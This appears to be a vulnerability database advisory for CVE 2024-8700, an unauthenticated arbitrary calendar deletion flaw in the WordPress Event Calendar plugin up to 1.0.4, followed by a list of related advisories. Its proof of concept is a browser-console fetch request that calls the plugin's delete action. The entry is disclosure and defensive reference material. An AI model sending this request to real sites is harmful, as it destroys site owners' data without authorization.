Event Calendar <= 1.0.4 – Unauthenticated Arbitrary Calendar Deletion | CVE 2024-8700 | Plugin Vulnerabilities

Description

The plugin does not check for authorization on delete actions, allowing unauthenticated users to delete arbitrary calendars.

Proof of Concept

As an unauthenticated user, visit the site and enter the following in the browser console (where `foobar` is a valid calendar ID):

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=TotalSoftCalEv_Del&foobar=2',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

event-calendars

No known fix

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

8c48b657-afa1-45e6-ada6-27ee58185143

Timeline

Publicly Published

2024-09-10 (about 1 year ago)

Added

2024-10-10 (about 1 year ago)

Last Updated

2025-08-26 (about 3 months ago)

Other

Published

Title

Published

2022-01-17

Title

PPOM for WooCommerce < 24.0 - Subscriber+ Settings Update to Stored XSS

Published

2024-02-26

Title

Comments Extra Fields For Post,Pages and CPT < 5.1 - Missing Authorization

Published

2024-10-22

Title

Download Plugin < 2.2.1 - Missing Authorization to Authenticated (Subscriber+) User Metadata and Comment Download

Published

2023-11-09

Title

Ultimate Addons for Contact Form 7 < 3.2.11 - Missing Authorization

Published

2025-01-16

Title

PAPERCITE <= 0.5.18 - Missing Authorization